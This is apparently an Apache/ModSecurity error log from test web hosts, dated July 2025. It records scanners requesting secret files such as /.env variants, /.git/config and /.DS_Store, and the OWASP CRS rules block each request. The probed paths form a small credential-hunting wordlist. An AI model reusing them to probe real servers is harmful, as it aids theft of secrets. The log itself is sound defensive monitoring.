[Mon Jul 28 04:03:41.724741 2025] [:error] [pid 1515929] [client 206.189.84.135:34184] [client 206.189.84.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIbafYDlDWLN7Jhc4DOkmwAAAAI"]
[Mon Jul 28 04:04:01.314822 2025] [authz_core:error] [pid 1515929] [client 206.189.84.135:33738] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/jquery-file-upload
[Wed Jul 30 03:34:40.863156 2025] [:error] [pid 1565745] [client 216.81.248.58:53154] [client 216.81.248.58] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aIl2sMW-ZFSdyF7ZncrlQAAAAAE"]
[Wed Jul 30 03:34:40.865744 2025] [:error] [pid 1565745] [client 216.81.248.58:53154] [client 216.81.248.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aIl2sMW-ZFSdyF7ZncrlQAAAAAE"]
[Wed Jul 30 03:34:40.865894 2025] [:error] [pid 1565745] [client 216.81.248.58:53154] [client 216.81.248.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aIl2sMW-ZFSdyF7ZncrlQAAAAAE"]
[Wed Jul 30 13:08:06.188789 2025] [:error] [pid 1576480] [client 93.123.109.4:58324] [client 93.123.109.4] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIn9Fh_lYyHDAGkA8ZUW3QAAAA4"]
[Wed Jul 30 13:08:06.189095 2025] [:error] [pid 1576480] [client 93.123.109.4:58324] [client 93.123.109.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIn9Fh_lYyHDAGkA8ZUW3QAAAA4"]
[Wed Jul 30 13:08:06.189268 2025] [:error] [pid 1576480] [client 93.123.109.4:58324] [client 93.123.109.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIn9Fh_lYyHDAGkA8ZUW3QAAAA4"]
[Wed Jul 30 13:08:06.373034 2025] [:error] [pid 1576484] [client 93.123.109.4:58330] [client 93.123.109.4] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aIn9FgSAY3qBIoISB5HWzwAAAA8"]
[Wed Jul 30 13:08:06.373315 2025] [:error] [pid 1576484] [client 93.123.109.4:58330] [client 93.123.109.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aIn9FgSAY3qBIoISB5HWzwAAAA8"]
[Wed Jul 30 13:08:06.373572 2025] [:error] [pid 1576484] [client 93.123.109.4:58330] [client 93.123.109.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aIn9FgSAY3qBIoISB5HWzwAAAA8"]
[Wed Jul 30 13:08:06.491130 2025] [:error] [pid 1572605] [client 93.123.109.4:58334] [client 93.123.109.4] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aIn9Fh4OdNqCIdRlHH8uhQAAAAQ"]
[Wed Jul 30 13:08:06.491405 2025] [:error] [pid 1572605] [client 93.123.109.4:58334] [client 93.123.109.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aIn9Fh4OdNqCIdRlHH8uhQAAAAQ"]
[Wed Jul 30 13:08:06.491584 2025] [:error] [pid 1572605] [client 93.123.109.4:58334] [client 93.123.109.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aIn9Fh4OdNqCIdRlHH8uhQAAAAQ"]
[Wed Jul 30 13:08:06.692100 2025] [:error] [pid 1576495] [client 93.123.109.4:58340] [client 93.123.109.4] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aIn9Fhp-oFU6YStIUf75zQAAABA"]
[Wed Jul 30 13:08:06.692371 2025] [:error] [pid 1576495] [client 93.123.109.4:58340] [client 93.123.109.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aIn9Fhp-oFU6YStIUf75zQAAABA"]
[Wed Jul 30 13:08:06.692540 2025] [:error] [pid 1576495] [client 93.123.109.4:58340] [client 93.123.109.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aIn9Fhp-oFU6YStIUf75zQAAABA"]
[Wed Jul 30 13:08:06.944514 2025] [authz_core:error] [pid 1572565] [client 93.123.109.4:58350] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Wed Jul 30 13:08:07.221453 2025] [:error] [pid 1576479] [client 93.123.109.4:58364] [client 93.123.109.4] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aIn9F-fjey2Nqd2J9Cr3DAAAAA0"]
[Wed Jul 30 13:08:07.222734 2025] [:error] [pid 1576479] [client 93.123.109.4:58364] [client 93.123.109.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aIn9F-fjey2Nqd2J9Cr3DAAAAA0"]
[Wed Jul 30 13:08:07.222937 2025] [:error] [pid 1576479] [client 93.123.109.4:58364] [client 93.123.109.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aIn9F-fjey2Nqd2J9Cr3DAAAAA0"]
[Wed Jul 30 13:08:08.423290 2025] [:error] [pid 1576484] [client 93.123.109.4:58406] [client 93.123.109.4] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aIn9GASAY3qBIoISB5HW0AAAAA8"]
[Wed Jul 30 13:08:08.423591 2025] [:error] [pid 1576484] [client 93.123.109.4:58406] [client 93.123.109.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aIn9GASAY3qBIoISB5HW0AAAAA8"]
[Wed Jul 30 13:08:08.423772 2025] [:error] [pid 1576484] [client 93.123.109.4:58406] [client 93.123.109.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aIn9GASAY3qBIoISB5HW0AAAAA8"]
[Wed Jul 30 13:08:08.552084 2025] [:error] [pid 1572605] [client 93.123.109.4:58418] [client 93.123.109.4] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aIn9GB4OdNqCIdRlHH8uhgAAAAQ"]
[Wed Jul 30 13:08:08.552338 2025] [:error] [pid 1572605] [client 93.123.109.4:58418] [client 93.123.109.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aIn9GB4OdNqCIdRlHH8uhgAAAAQ"]
[Wed Jul 30 13:08:08.552518 2025] [:error] [pid 1572605] [client 93.123.109.4:58418] [client 93.123.109.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aIn9GB4OdNqCIdRlHH8uhgAAAAQ"]
[Wed Jul 30 13:08:08.732640 2025] [:error] [pid 1576495] [client 93.123.109.4:58426] [client 93.123.109.4] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aIn9GBp-oFU6YStIUf75zgAAABA"]
[Wed Jul 30 13:08:08.732890 2025] [:error] [pid 1576495] [client 93.123.109.4:58426] [client 93.123.109.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aIn9GBp-oFU6YStIUf75zgAAABA"]
[Wed Jul 30 13:08:08.733081 2025] [:error] [pid 1576495] [client 93.123.109.4:58426] [client 93.123.109.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aIn9GBp-oFU6YStIUf75zgAAABA"]
[Wed Jul 30 20:14:53.114043 2025] [:error] [pid 1576471] [client 195.178.110.68:64837] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphHeaG-8e7YfmJ05Ol_QAAAAY"]
[Wed Jul 30 20:14:53.114318 2025] [:error] [pid 1576471] [client 195.178.110.68:64837] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphHeaG-8e7YfmJ05Ol_QAAAAY"]
[Wed Jul 30 20:14:53.114526 2025] [:error] [pid 1576471] [client 195.178.110.68:64837] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphHeaG-8e7YfmJ05Ol_QAAAAY"]
[Wed Jul 30 20:14:53.226826 2025] [:error] [pid 1576469] [client 195.178.110.68:63091] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphHRH4mD4szYvnkeEARgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Wed Jul 30 20:14:53.227086 2025] [:error] [pid 1576469] [client 195.178.110.68:63091] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphHRH4mD4szYvnkeEARgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Wed Jul 30 20:14:53.227248 2025] [:error] [pid 1576469] [client 195.178.110.68:63091] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aIphHRH4mD4szYvnkeEARgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.git/config
[Wed Jul 30 20:14:58.164018 2025] [authz_core:error] [pid 1567421] [client 143.244.168.161:46474] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Jul 30 20:14:59.135306 2025] [:error] [pid 1584508] [client 143.244.168.161:46498] [client 143.244.168.161] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aIphIx2kn_8M4Vm6kJdNlQAAAA4"]
[Wed Jul 30 20:14:59.135575 2025] [:error] [pid 1584508] [client 143.244.168.161:46498] [client 143.244.168.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aIphIx2kn_8M4Vm6kJdNlQAAAA4"]
[Wed Jul 30 20:14:59.135752 2025] [:error] [pid 1584508] [client 143.244.168.161:46498] [client 143.244.168.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aIphIx2kn_8M4Vm6kJdNlQAAAA4"]
[Wed Jul 30 20:14:59.412183 2025] [:error] [pid 1565747] [client 143.244.168.161:46506] [client 143.244.168.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIphI0-7kYLRyZuY-tPHrwAAAAM"]
[Wed Jul 30 20:14:59.412387 2025] [:error] [pid 1565747] [client 143.244.168.161:46506] [client 143.244.168.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIphI0-7kYLRyZuY-tPHrwAAAAM"]
